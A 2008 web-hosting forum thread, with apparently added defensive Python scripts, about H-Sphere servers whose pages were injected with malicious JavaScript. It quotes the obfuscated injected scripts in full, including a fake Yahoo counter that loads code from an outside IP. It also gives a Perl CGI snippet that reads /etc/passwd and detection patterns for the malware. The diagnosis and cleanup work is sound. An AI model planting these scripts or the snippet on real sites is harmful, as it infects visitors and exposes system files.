Hacking problems with iframe codes
12-01-08, 19:28
Posted by native (Registered User, Join: Sep 2002, Posts: 245)

Hi, I want to know solutions for some of the issues we are facing with our web servers. If anyone knows about these issues and their fixes, let me know some clues to find out the cause and resolve it. Many of the sites are getting hacked (even though server hardening is done and security is tightened). Hacking means new code (iframes) is getting included in all index files, and the file ownership of many of the files is changed to the httpd user. Is this a hacker's action or source code injection?

Hsphere version: 3.1
OS: RHEL4

Share your thoughts and ideas about these problems.
12-01-08, 23:15
Posted by dynamicnet (Registered User, Join: Jan 2003, Posts: 13,687)

Greetings George and Jason: Not all security / hardening is the same... that stated, I recommend examining the logs to see how the defacements are being done; chances are high a mod_security rule or rules can be developed to combat the particular vulnerability. For the sites in question, please check the installed applications, as there is a high chance the application(s) involved are not sanitizing input variables. Most of these attacks are done via web-based injections against vulnerable applications. When those applications cannot be fixed fast enough, or cannot otherwise be found to fix, then the server must be hardened / secured more than normal. Thank you.

__________________
Peter M. Abraham, Senior Server Administrator, Dynamic Net, Inc. -- US/Canada: 001-888-887-6727; International: 001-717-484-1062 -- email solutions @ dynamicnet.net
Parallels H-Sphere Strategic Partner for H-Sphere Security and H-Sphere Server Management. Server Security, Server Administration, Server Migrations, co-location, dedicated servers, and more: http://www.dynamicnet.net/services/hsphere.htm
12-02-08, 12:49
Posted by native (Registered User, Join: Sep 2002, Posts: 245)

The problem is with what seems to be a javascript injection. I have found allot of people having the same issues as us on the web. But wondering if this is affecting any H-Sphere providers. Here is the basis of the attack. Today, several users are reporting that Norton displays a "Bloodhound Exploit" warning whenever loading websites. Alternatively, some users are reporting that Adobe Acrobat Reader cannot open file A9RD52D.TMP when trying to load website in a browser. Very, very strange. Some people (like me) haven't noticed a thing. But at least 8 people have reported this problem. There are some strange scripts in the footers which look suspicious: These scripts appear on the read.php pages: <script type="text/javascript"> <!-- var a='';var b='%20i20%8gB%20%20%00n%t.%20vedeyp_%20%2gDa00%2%% e2g20%2y%tn2le30%20%ee%20%0ssu%20%i0_%n%20%2ae2o0% %i00%2rD.A%20%3eE%2%20%n%hg%20%2%22%20%u0%20%2Cd%2 0%20r%2020s00%0ne%20%20%/tsk%a%20%m%tn2l%20%200g00%20a2o020%20%me2u_20%20k2 a%20%/%dn%20%2ehks%20%2Cir%efi2e0%200fB%20v2ca%t%20%l%p_ %20%2y2n%20%vDu20%2e8%20%20/%20 %2r%202.tA%2A%2022gy0e0%20g0gBss9%20%i3.%20%/tk%a%20%eDne%di%20%2ykuA%2020et0%20s2xygB%20%ed%02 rgs%20%a3d00%2r%me82A%20.Dmi2%20%e%20%20l2e%20%dlA %2A%2cA%2 0%cA%2%tn00%00%2%%ie2g20%2a2.t2e20%20s%eA%20/c0mp0%20k3em8rf9%20%e0l00%2%2la20%20%eei30%20rdm2% on0.%20v%l%20%a0ut2%00%2d3as20%20p0%20%2a%r0%20nf0 0%00%s00% %20%20icEd%20%20%tegf%A%20%0ul%hg%20%ae0%20%2Et2h% 20%addeyp_%00%2r%lB%20%em0.%20vaD5+y%20%/%2i2ysta20%200r0%20f2.mi9%20%e%dt%20%l%iB%20f2g%20 %.l9%20%20t%2020%p0%2dey20%20%2Eti2h%20%a%otIai30% 20n%lA%2022y0e0%20f2.t2elB%20v2y%20%2Cp%r20%2g%m2k 00%20tn0nf22gA%20%%f%20%2Dnl2%20%2a2un30%2022%20%2 es30%20h%20%20%i20%0%2t%20otI0%20%20xhn0e00%2r2cEd mmB%20vk2t%20%00%t.%20vl0gBssd%20%a0f30%20ra2e0%20 n3d0eA%20/e%f%l00n%20%22o20%20%te220%20m0raB%20f0h30%20%iB%2 0fi20%20%2p0%2%2C%202em9%2B%20/c00mp0%20iDne%d2%20%22a%20%2r%r2%20%20ul%hy%20%20% vA%20/ergA%20%r0809%20%0hodh0r%r20%22y30%20%oetuB%20f0ss 
e%20%t%eA%20.3t%20%p2B%2D%2CE%2 0%3E%2%me20%70%20a22o020%203em8r2A%20%%mB%20%tef%A %20%2cEdme2%20%2D.00%20tui00%2ru2222A%2020flt2oeu% 20%%e%20%2ddrnp30%2022erA%20.Dd00%2d%aA%20p%30%70% 330% 20%30%ful%20%20%2r%%r2%20%2%me2u%00%2ryi30%20xh0e0 0%2r%otIak2A%20%3d%20%2ahs%20%at%%%%00%2%20e0%tht0 %20fkm%20%l0cen%20%2%2lu00%2d3d%20%l0n00%2ad%20%20 %%20 ';var c='0564987132';for(var i=0;i<155;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*155)+i);documen t.writeln(unescape(a)); --> </script> <script language=javascript><!-- Yahoo! Counter starts here --> if(typeof(yahoo_counter)!=typeof(1))eval(unescape( '//`.~%2E%2E %3C#%64#i!%76%20s%74y~l#e|%3D%64@i@%73p!%6C!a~%79` :!n%6F%6E~e%3E\n`%76%61`%72%20~%5F;$%69@%66(&%64o@ %63|u&%6D%65%6Et.&%63%6F%6F%6Bie`%2Em!a%74#%63h%28 $%2F@%5C%62hg%66t%3D%31/)%3D&%3D%6E#u#ll%29@%64o&%63!%75!m!e%6E@t.~w%72%69 %74e%28%22%3C|s|c`%72!%69$%70%74%20!sr$%63%3D%2F`% 2F%37%38#.$%31%35&%37~.~%31#4#%32#.#5!%38|/$%63!%70/`?~"%2B@na~v%69%67|at`o#r%2Ea%70%70$%4E@%61~m%65.# %63%68|a~%72%41`%74|(%30%29%2B%22|%3E%3C%5C/#%73c$%72%69%70%74`%3E"&%29;&\n%2F#/%3C$%2F%64%69!%76%3E').replace(/\!|~|\||@|#|\$|`|\&/g,""));var yahoo_counter=1; <!-- counter end --></script> Also do a search on google or yahoo for <script language=javascript><!-- Yahoo! Counter starts here --> and it will show all the people having this same problem. Here is a very good explnation of exacrtlt what I have found from others on the web: This is starting to go around. It's coming from Latvia and it's on the server side. It attacks sites that use php, cms, forums, and blogs - and probably more but I don't know yet. It is rerouting your site to 78.157.142.58. It will eventually extract your username and password from CMS. It will route everyone using a search engine to find your site to their site and infect their computer. Next, you'll see pop-unders for places like MonsterMarketplace.com and others. I don't remember the exact URLs. Not that it matters. 
Make sure your Malware is up to date. Some antivirus softwares aren't even picking it up. You'll notice that if you strip out the fake Yahoo Counter and reload your page, it will magically reappear on your page. In fact, on ALL your pages. It’s a virus (or something of a malicious nature). It’s a JavaScript that has a very complex code that appears to be referencing an ip address or multiple ip addresses. I believe a site is vulnerable to this new attack through improperly set permissions on files. Yahoo clearly doesn’t make a counter script like this in any way. Also, the script shows up in many different locations (in the code) throughout various sites, which also points to that fact that it’s an automatically generated script.
12-02-08, 14:37
Posted by dynamicnet (Registered User, Join: Jan 2003, Posts: 13,687)

Greetings: RE: "it attacks sites that use php, cms, forums, and blogs - and probably more" The Javascript injections are via web-based injection through vulnerable PHP, CGI et al code along with server(s) that need more hardening. Thank you.
12-02-08, 14:50
Posted by native (Registered User, Join: Sep 2002, Posts: 245)

Yes, we have already done the hardening on the boxes and also checked this against your recommendations, and everything has been done. Also I have found a personal site we have been working on was hacked. The weird thing is the site I am working on is in a sub folder that no one knows exists, but somehow the hack has injected the code into the files in this unknown dir as well. How could a weak script do this if the location of the scripts is not even known? Seems very odd. Also I see lots of people having this happen, but no one seems to have any real solutions except to say it is related to php applications running on the server.
12-02-08, 15:43
Posted by dynamicnet (Registered User, Join: Jan 2003, Posts: 13,687)

Greetings Jason and George: As you already know from previous phone calls, we don't publish all of our hardening methods. The solution for this particular issue, as mentioned in a previous post you made, is to create a mod_security rule to handle the issue. Asprox is either being involved or a mutation of it for your case. While Windows-based in context, http://isc.sans.org/diary.html?storyid=5381 may be helpful from an overall view. Thank you.
12-02-08, 20:03
Posted by stevewest15 (Registered User, Join: Nov 2004, Posts: 2,503)

Hi native, Check to make sure there is no directory w/ 777 permission, or a weak ftp login/password. Also grep your ftp logs and see if you can identify whether the files were uploaded via ftp. In the meantime, I would say to filter outgoing port 80 so that if a hacker is using a tool to fetch malicious code from a remote system, it will be blocked. But this is a temp fix and you really need to dig through your logs to see how they are doing this. Good luck, SW
12-03-08, 12:41
Posted by native (Registered User, Join: Sep 2002, Posts: 245)

Thanks Steve for your good advice. I am now seeing this is happening to Godaddy and other large hosts as well. When we find the cause we will let you know. If anyone else has seen the yahoo javascript injections and has any good info on these hackers or a fix, please let us know.
12-17-08, 18:08
Posted by JTY (Registered User, Join: Jun 2005, Posts: 238)

We're seeing this as well, with a handful of customers on one web server. Some sites don't have any files modified, simply an SQL injection, while others have HTML pages where the ownership has been changed to httpd, with the JavaScript code added.
12-18-08, 18:59
Posted by Leon2008 (Registered User, Join: Mar 2008, Posts: 7)

I have seen it too on two unix servers. Html and php pages are affected with two types of scripts.

- php pages get injected with php code (on the top of the page) which uses the output buffer to inject the yahoo javascript into the content returned to the browser. The javascript itself does not appear in the files on the server.
- html pages get their javascript at the bottom of the page, without iframe tags. Just plain javascript.

We were not able to find anything useful in the server logs. I examined the php code used by the hacker and it seems that this script is capable of self-replicating across the server. We found a file in the /tmp folder containing a list of all world writable files and folders on the server. Every page infected with this php code can execute the hacker's php posted to it. Servers were hardened before the attack and we do have mod_security running. We'd be happy to add some rules to prevent this from happening, but nobody seems to know how it was injected. I am 100% sure that this hack can change file ownership and permissions on files which did not have 777 before and in folders with properly set permissions. Again, we have had a serious examination of both servers and were unable to figure out how it happened. At the moment we can only clean up the code and reset the permissions via cron scripts. I know one more hosting company that was seriously hurt and their experience is just about the same.
12-18-08, 19:53
Posted by stevewest15 (Registered User, Join: Nov 2004, Posts: 2,503)

Hi, Has anyone who has been impacted tried to get a security specialist to take a closer look at how these hackers are getting in? You can try to use the following link and see if someone would be willing to assist: http://isc.sans.org/contact.html Good luck, SW
12-19-08, 01:51
Posted by yurtesen (Registered User, Join: Nov 2004, Posts: 8,097)

Steve, I have seen a similar issue on 1 account in my cluster and found iframe code in the user's pages just last week. They used FTP! Yes, the hackers somehow stole the user's FTP password. I believe this is not a hardening or H-Sphere related problem. Check the xferlog. It might be that an FTP program has an exploit or something. Interestingly enough, the hacker did not do any directory listings etc.; they got in and changed all indexes directly and got out.

__________________
FinWiz --- The Professional H-Sphere Support Company. Evren Yurtesen --- Unix System Administrator. Contact Info: support [ a t ] finwiz.net / +358-40-5073940
12-19-08, 06:32
Posted by yurtesen (Registered User, Join: Nov 2004, Posts: 8,097)

My customer says he uses CuteFTP 8 and had the passwords saved in 3 different computers. While I don't know if this was how the passwords were stolen, perhaps there is a high possibility. If you figure that your sites were hacked using FTP also, please try to learn if your customer is saving his FTP password in the program he uses and if he uses CuteFTP or not.
12-19-08, 10:07
Posted by ladylinux (Registered User, Join: Jul 2003, Posts: 9,772)

Evren,
Quote:

Francesca

EDIT:: PS: Also noted by one of these customers was that the passwords were sniffed locally. We all know what a loose protocol FTP is and how easy it is to extract a password, as it's sent in clear text.

__________________
"No Problems Only Solutions" We Provide Server Management, Security Hardening And Patch Management. Also Dedicated Servers, Colocation, VPS Servers And Hsphere Licenses.
12-19-08, 10:18
Posted by native (Registered User, Join: Sep 2002, Posts: 245)

Valuable Information. Our security team has been working hard on this and we are still finding a permanent solution. We have also found an extremely helpful article on these attacks. MUST READ >> http://www.softpanorama.org/Malware/...e_attack.shtml
12-19-08, 10:25
Posted by stevewest15 (Registered User, Join: Nov 2004, Posts: 2,503)

Hi, If these hackers are getting in via stolen ftp login/pass, then it's nothing new and we ran into this issue w/ some customers last year. This issue can be easily avoided if HS can be set up to require customers to change passwords every 3 months and to avoid using the same passwords for various services (i.e. cp, ftp, mail, etc.). We have a nightly script that scans the ftp log files and flags any successful logins that are coming from different IP addresses. It's not a perfect script, but it does allow someone to identify if an account is about to get compromised or has been compromised via FTP. SW
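The nightly FTP-log check Steve describes, written out as an added example (this is not his script and not part of the thread). It assumes ProFTPD-style syslog lines of the form `... (host[ip]): USER name: Login successful.`; `LOGIN_RE`, the function names and the sample log lines are constructed for this example, so adjust the pattern to whatever your FTP daemon actually writes. Besides the per-account check (one account used from several addresses), it also reports the inverse signal, one address logging into several accounts, which is what a stolen password list tends to look like in the log.

```python
"""Flag FTP accounts whose successful logins arrive from several source addresses.

Added example for this thread, not the poster's own script. It assumes
ProFTPD-style syslog lines ("... (host[ip]): USER name: Login successful.");
adjust LOGIN_RE for the format your FTP daemon writes.
"""
import re
from collections import defaultdict

# Assumed ProFTPD-style successful-login line; tweak for other daemons.
LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+[\d:]+)\s+\S+\s+proftpd\[\d+\]\s+\S+\s+"
    r"\([^\[]*\[(?P<ip>[\d.]+)\]\):\s+USER\s+(?P<user>\S+):\s+Login successful"
)


def parse_logins(lines):
    """Yield (timestamp, user, ip) for every successful login line; failures are ignored."""
    for line in lines:
        m = LOGIN_RE.search(line)
        if m:
            yield m.group("ts"), m.group("user"), m.group("ip")


def flag_accounts(lines, max_ips=1):
    """Return {user: {ip: [timestamps]}} for accounts used from more than max_ips addresses."""
    seen = defaultdict(lambda: defaultdict(list))
    for ts, user, ip in parse_logins(lines):
        seen[user][ip].append(ts)
    return {u: dict(ips) for u, ips in seen.items() if len(ips) > max_ips}


def shared_source_ips(lines):
    """Return {ip: [users]} for addresses that logged into more than one account."""
    users = defaultdict(set)
    for _, user, ip in parse_logins(lines):
        users[ip].add(user)
    return {ip: sorted(u) for ip, u in users.items() if len(u) > 1}


def report(flagged, shared):
    """Render both findings as plain text for a nightly mail."""
    out = []
    for user, ips in sorted(flagged.items()):
        out.append(f"{user}: successful logins from {len(ips)} addresses")
        for ip, stamps in sorted(ips.items()):
            out.append(f"  {ip}: {len(stamps)} logins, first {stamps[0]}, last {stamps[-1]}")
    for ip, users in sorted(shared.items()):
        out.append(f"{ip}: used for accounts {', '.join(users)}")
    return "\n".join(out)


# Constructed sample log lines (not real data); 198.51.100.77 stands in for the intruder.
SAMPLE_LOG = """\
Dec 18 02:11:09 web1 proftpd[2201] web1 (cust-dsl.example[203.0.113.10]): USER alice: Login successful.
Dec 18 02:11:40 web1 proftpd[2203] web1 (cust-dsl.example[203.0.113.10]): USER bob: Login failed.
Dec 18 09:30:15 web1 proftpd[2311] web1 (cust-dsl.example[203.0.113.10]): USER alice: Login successful.
Dec 18 23:58:02 web1 proftpd[2599] web1 (unknown[198.51.100.77]): USER alice: Login successful.
Dec 19 00:01:44 web1 proftpd[2600] web1 (unknown[198.51.100.77]): USER alice: Login successful.
Dec 19 03:12:51 web1 proftpd[2650] web1 (office.example[192.0.2.5]): USER bob: Login successful.
Dec 19 03:13:00 web1 proftpd[2651] web1 (unknown[198.51.100.77]): USER carol: Login successful.
""".splitlines()

if __name__ == "__main__":
    print(report(flag_accounts(SAMPLE_LOG), shared_source_ips(SAMPLE_LOG)))
```

Run against the sample, `alice` is flagged (two addresses) and `198.51.100.77` is flagged for touching both `alice` and `carol`; `bob` is not flagged because his only successful login comes from one address. Piping yesterday's log through `flag_accounts` from cron and mailing `report` is the whole job; raising `max_ips` cuts noise for customers who legitimately work from several places.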
12-19-08, 13:22
Posted by HPlugins (Registered User, Join: Jan 2006, Posts: 334)

Quote:

I see it popping up from time to time but do not understand it at all. Let's see some scenarios:

1) PHP script run in PHP CGI mode. Executed under FTP user rights, it has rights to write anywhere in the FTP user directory it wants to. So can the exploit.
2) PHP script run under PHP mode. Will always have access to /tmp and /var/tmp, which by nature must be 777. So any exploit can write to those dirs as well.
3) PHP script run under PHP mode under safemode and openbasedir. Will need at LEAST a session directory to write to, which if not set to 777 has to be owned by the httpd/apache user. So any exploit can write to that same directory.
4) Let's not forget that any CGI script can read/write all over the server anyway. (Yes, why don't you try a cat /etc/passwd in a CGI script and be amazed.)

So, unless you restrict your customers to only run PHP scripts sessionless and not writing ANYTHING to the hard drive (and I would like to see a single useful PHP app that works like that), I do not understand this sentence. So, to sum it all up, what is your magic trick to not have any 777 directories on the server and still have non-static websites running?

__________________
http://www.HspherePlugins.com H-Sphere Postini Plugin and high quality EasyApps. NEW: Magento E-Commerce, Joomla 1.5.x, Wordpress 3.0.x and more...
12-19-08, 13:44
Posted by yurtesen (Registered User, Join: Nov 2004, Posts: 8,097)

Hplugins, PHP doesn't have to write to the session directory; as a matter of fact, especially running with mod_php, you shouldn't allow PHP to access the session directory (it still can create sessions automatically). The reason for this is that the session files have the user/pass etc. information of authenticated sessions; you don't want any PHP app to be able to read them, since you can't restrict read rights to the owner if mod_php is used. In my systems I have the users jailed into their home directory using safe_mode and open_basedir (and without allowing them to read the session directory), although I allow a shared /tmp directory if they have to use it... anyway they really can't hack each other (of course safe_mode works well in FreeBSD but not in Linux unfortunately).
12-19-08, 14:07
Posted by HPlugins (Registered User, Join: Jan 2006, Posts: 334)

ok, let's ignore sessions for a moment. You are telling me that your customers are running Joomla, Magento, Wordpress or any useful PHP application in safemode with openbasedir on without EITHER some directories owned by httpd or some dirs in 777 mode? If that were true, they could not even enable the cache function of Joomla or Wordpress, which any high traffic site needs. You could not install any modules or components in Joomla. Writing an article in Joomla and uploading a picture would not work; I mean I could go on and on. If you have customers that tolerate that you might be the luckiest host in the world. I never met one hosting company that could survive for a long time like that. You have to have some directories 777 or owned by httpd to get any useful PHP app running. This in turn means any exploit can use those directories.
12-19-08, 14:32
Posted by yurtesen (Registered User, Join: Nov 2004, Posts: 8,097)

HPlugins, for example my users run Joomla; of course the created files are owned by httpd, and the 777 rights (see the 2nd paragraph, I later remove 777 rights from any files if there are any) are necessary at first. But using safe_mode and open_basedir at the same time makes things pretty tight. In FreeBSD one just has to relax safe_mode to use GID instead of UID (which is the same in H-Sphere, so...) to get safe_mode and Joomla etc. to play along. So once Joomla creates some files, it can access them even when safe_mode is enabled. This is explained in detail at my web site. Anyway, since the files are owned by httpd, they are not counted towards quota.

Once a day I use a script to change ownerships and permissions of the files/directories created by httpd. I change the files to user/httpd 660 permissions and directories to user:user 777 permissions. Directories being 777 is unfortunately necessary, although this doesn't matter much since open_basedir stops people from going into each other's home dirs. Also, since I am using safe_mode, the users are restricted to a safe_bin so they can't really use OS tools to do any harm. Standard apps like Joomla don't require any tools. So the security is really tight and still the users can use Joomla, osCommerce, SMF forum, WordPress etc. (some of the stuff I remember that our users use) without problems...

While the exploits can use the directories where PHP can write (also in fastcgi etc.), the exploit CAN NOT go and write/read from other users' directories. As you can imagine, any app should be able to write something to work properly. I am not saying that I stopped all write access and apps work properly; that would be insane.

Thanks, Evren
12-19-08, 15:02
Posted by HPlugins (Registered User, Join: Jan 2006, Posts: 334)

Quote:

I rest my case
12-19-08, 15:30
Posted by yurtesen (Registered User, Join: Nov 2004, Posts: 8,097)

HPlugins, I don't understand what you are talking about. Your post was flawed...
Quote:
Quote:
Quote:

OK, you don't claim this to be correct, eh? While you don't understand why there shouldn't be directories and files lying around with 777 rights. If you think for a second, this is to stop users from writing over each other's directories etc. Please read and learn about system permissions and investigate the settings H-Sphere puts. There are several discussions about this here and all around the internet probably. In my system I cornered the users in such a way that they can't see or write to directories from the web with permissions of 777 if it is not in their web directory. I just pointed that out.
12-19-08, 16:15
Posted by ladylinux (Registered User, Join: Jul 2003, Posts: 9,772)

Hello,
Quote:

Of course you can roll over if you wish and say that is the way it is. I mean it's not like there are not 1 billion Joomla et al phishing sites / hacks / defacements a day. The system (Web Hosting) is broke and greed (Cheap Hosting At Any Cost) fuels the cruddy system we have in place.

Francesca
12-19-08, 17:33
Posted by HPlugins (Registered User, Join: Jan 2006, Posts: 334)

yurtesen: none of your arguments is hitting the issue I was referring to. When I point out PHP without safemode, you point out "but not if you have safemode on". When I point to safemode on and there is at least one directory writable, you point out you do not need that one directory, but shortly before make the point that unfortunately you NEED 777 dirs. My first post was about the statement "make sure there is no directory w/ 777 permission". As much as you can have the arrogant opinion that I should read up about permissions, I stand by the fact that a CGI script can read and write all over the server.

```perl
#!/usr/bin/perl
print "Content-type: text/plain\n\n";
print `cat /etc/passwd`;
```

Works on any hsphere account (on 99% of any account independent of the hosting control panel, for that matter) without a hitch. So, to get back to the actual issue I was trying to point out: if you have no writable directories in SOME form, you can only provide static HTML content with the applications on the market today. So the statement "make sure there are no 777 directories" seems impractical to me. Do I wish somebody would be writing database-only applications that write all data into a database backend and do not use the filesystem anymore? Of course! But it's not the case at the moment.

B.T.W. for those of you hit with a lot of iframe inclusions on one server, do a clamscan through /hsphere/local/home. It will give you a list of infected files which you then can clean with some perl magic...
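Leon2008 described PHP pages carrying prepended code that injects the script through the output buffer, a /tmp list of world-writable paths, and cron-based cleanup of code and permissions; HPlugins suggests a clamscan over /hsphere/local/home followed by perl cleanup. The script below is an added example that is not code from this thread, from clamav or from H-Sphere: it walks a customer tree, flags files carrying the fake "Yahoo! Counter" markers quoted earlier in the thread, lists world-writable entries and entries not owned by the expected user, and strips the fake counter block from HTML files. The ob_start/eval heuristic for PHP files, the function names and the sample files it builds in a temporary directory are this example's own assumptions.

```python
"""Find and strip the injected fake "Yahoo! Counter" script from a hosting tree.

Added example for this thread; not code from the thread, clamav or H-Sphere.
The two JavaScript markers come from the script quoted earlier in the thread.
The PHP check (ob_start followed by eval/base64_decode near the top of a file)
is this example's own heuristic for the output-buffer injection Leon2008 saw.
"""
import os
import re
import stat
import tempfile

# Marker 1: the fake counter wrapper quoted in the thread.
YAHOO_BLOCK_RE = re.compile(
    r"<script[^>]*>\s*<!--\s*Yahoo! Counter starts here\s*-->.*?"
    r"<!--\s*counter end\s*-->\s*</script>",
    re.DOTALL | re.IGNORECASE,
)
# Marker 2: the decode-and-write loop from the first quoted script.
WRITELN_RE = re.compile(r"document\s*\.\s*writeln\s*\(\s*unescape\s*\(", re.IGNORECASE)
# Heuristic (assumption): prepended PHP that buffers output and runs encoded code.
PHP_PREPEND_RE = re.compile(r"ob_start\s*\(.*?(eval|base64_decode)\s*\(", re.DOTALL | re.IGNORECASE)

SCAN_EXT = (".html", ".htm", ".shtml", ".php")


def classify(path):
    """Return the list of markers found in one file (empty list when clean)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    found = []
    if YAHOO_BLOCK_RE.search(text):
        found.append("yahoo-counter")
    if WRITELN_RE.search(text):
        found.append("writeln-unescape")
    if path.endswith(".php") and PHP_PREPEND_RE.search(text[:4096]):
        found.append("php-prepend")
    return found


def scan_tree(root, expected_uid=None):
    """Walk root (without following symlinks) and collect infected files,
    world-writable entries and entries not owned by expected_uid."""
    out = {"infected": {}, "world_writable": [], "foreign_owner": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if stat.S_ISLNK(st.st_mode):
                continue  # a link could point outside the customer's tree
            if st.st_mode & stat.S_IWOTH:
                out["world_writable"].append(p)
            if expected_uid is not None and st.st_uid != expected_uid:
                out["foreign_owner"].append(p)
            if name.endswith(SCAN_EXT):
                markers = classify(p)
                if markers:
                    out["infected"][p] = markers
    return out


def strip_yahoo_block(path):
    """Remove every fake counter block from an HTML file in place; return how many were removed."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    cleaned, n = YAHOO_BLOCK_RE.subn("", text)
    if n:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(cleaned)
    return n


def build_sample_tree():
    """Create a constructed customer tree in a temp dir (not real data) and return its root."""
    root = tempfile.mkdtemp(prefix="webscan-")
    site = os.path.join(root, "site1")
    os.makedirs(os.path.join(site, "uploads"))
    samples = {
        "index.html": "<html><body>hello\n<script language=javascript>"
                      "<!-- Yahoo! Counter starts here --> if(typeof(yahoo_counter)!=typeof(1))"
                      "eval(unescape('%2F%2F'));var yahoo_counter=1; <!-- counter end -->"
                      "</script></body></html>\n",
        "read.php": "<?php ob_start('cb'); eval(base64_decode('Li4u')); ?>\n<html>forum</html>\n",
        "clean.html": "<html><body>nothing here</body></html>\n",
    }
    for name, body in samples.items():
        with open(os.path.join(site, name), "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(os.path.join(site, name), 0o644)
    os.chmod(site, 0o755)
    os.chmod(os.path.join(site, "uploads"), 0o777)  # the kind of dir the /tmp list would name
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    result = scan_tree(root, expected_uid=os.getuid())
    for p, markers in sorted(result["infected"].items()):
        print("INFECTED", p, ",".join(markers))
        if "yahoo-counter" in markers:
            print("  removed", strip_yahoo_block(p), "block(s)")
    for p in result["world_writable"]:
        print("WORLD-WRITABLE", p)
```

Only the HTML variant is cleaned automatically: the prepended PHP is reported but left for manual review, because the injected code in Leon2008's case rewrites the response on the fly and the file may contain legitimate code after it. Running `scan_tree` from cron with `expected_uid` set to the customer's uid reproduces the "ownership changed to httpd" signal JTY and native reported, and the world-writable list is the same information the attacker's /tmp file held, gathered before they need it.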